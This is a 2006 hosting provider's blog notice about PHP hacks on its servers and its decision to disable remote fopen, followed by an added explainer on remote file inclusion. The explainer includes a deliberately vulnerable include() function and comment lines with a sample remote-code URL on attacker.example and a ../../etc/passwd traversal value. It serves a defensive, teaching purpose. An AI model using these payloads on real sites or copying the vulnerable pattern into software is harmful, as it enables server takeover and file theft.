Monday, October 16, 2006
PHP Fopen - Remote URLs
One of our cluster web servers has been hacked this evening. While no damage
has been caused to customer web sites and our monitoring system prevented
significant damage, the server in question has suffered some damage to the
point where a full reinstallation is advisable.
We have disabled the web sites of customers using products from
www.comdevweb.com as despite warnings on 27th September they have failed to
adequately secure their software resulting in two hacks within 4 days even
after security patches were applied.
As a temporary measure we have disabled the remote fopen function within PHP
in order to protect our servers from any further risk over the next 24 to 48
hours. While we appreciate that this is likely to cause problems for some
web sites, we feel that this is an essential step given that in the last 4
weeks our servers have suffered from over 10 semi-successful PHP hacks as a
result of sites using insecure code and running fopen functions.
We would ask customers using software which includes fopen calls to remote
sites to ensure that the sites are not vulnerable to remote code injection
techniques. We would also remind customers that they should subscribe to the
update mailing lists of any commercial or open source software which they
load onto our servers.
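The pattern behind the hacks described above is remote file inclusion: a script passes a request parameter to include(), and with PHP's allow_url_fopen directive (the "remote fopen function" the notice refers to) switched on, the parameter can name a URL on an attacker's server whose contents PHP then executes. The following is an added example, not code from the notice or from the vendor it names; the page name parameter, the pages/ directory and the template names are illustrative assumptions.

```php
<?php
// Added example: the include-by-request-parameter pattern that allow_url_fopen
// makes exploitable, a hardened version, and a check that the server setting
// is actually off. $_GET['page'], pages/ and the template names are assumed.

// VULNERABLE: the page name comes straight from the request. With
// allow_url_fopen on, a request such as
//   ?page=http://attacker.example/shell.txt%3F
// makes PHP fetch and execute the attacker's script (the trailing "?" turns the
// appended ".php" into a query string). Even with remote URLs blocked, a value
// such as ../../etc/passwd%00 still reaches local files on older PHP versions.
function renderPageVulnerable($page)
{
    include $page . '.php';
}

// HARDENED: map the request onto a fixed allowlist of local templates and
// refuse anything else, so no user-controlled string ever reaches include().
function renderPageHardened($page)
{
    $templates = array(
        'home'    => dirname(__FILE__) . '/pages/home.php',
        'contact' => dirname(__FILE__) . '/pages/contact.php',
    );
    if (!isset($templates[$page])) {
        header('HTTP/1.0 404 Not Found');
        echo 'Unknown page';
        return;
    }
    include $templates[$page];
}

// CHECK: confirm the server-wide setting is in effect. ini_get() returns "0"
// or "" when the directive is off, both of which are false in PHP.
// The corresponding php.ini lines are:
//   allow_url_fopen = Off
//   allow_url_include = Off   ; PHP 5.2 and later, governs include()/require()
function remoteFopenDisabled()
{
    return !ini_get('allow_url_fopen');
}

$page = isset($_GET['page']) ? $_GET['page'] : 'home';
renderPageHardened($page);

if (!remoteFopenDisabled()) {
    error_log('warning: allow_url_fopen is still enabled on this server');
}
```

Two caveats for anyone relying on the server-side setting alone. First, on PHP 5.2 and later, include() and require() of URLs are controlled by the separate allow_url_include directive, so both directives should be off. Second, disabling remote fopen only blocks the remote-fetch half of the attack; the real fix is in the application, which must never hand a request-derived path to include(), require() or fopen() without resolving it against an allowlist as above.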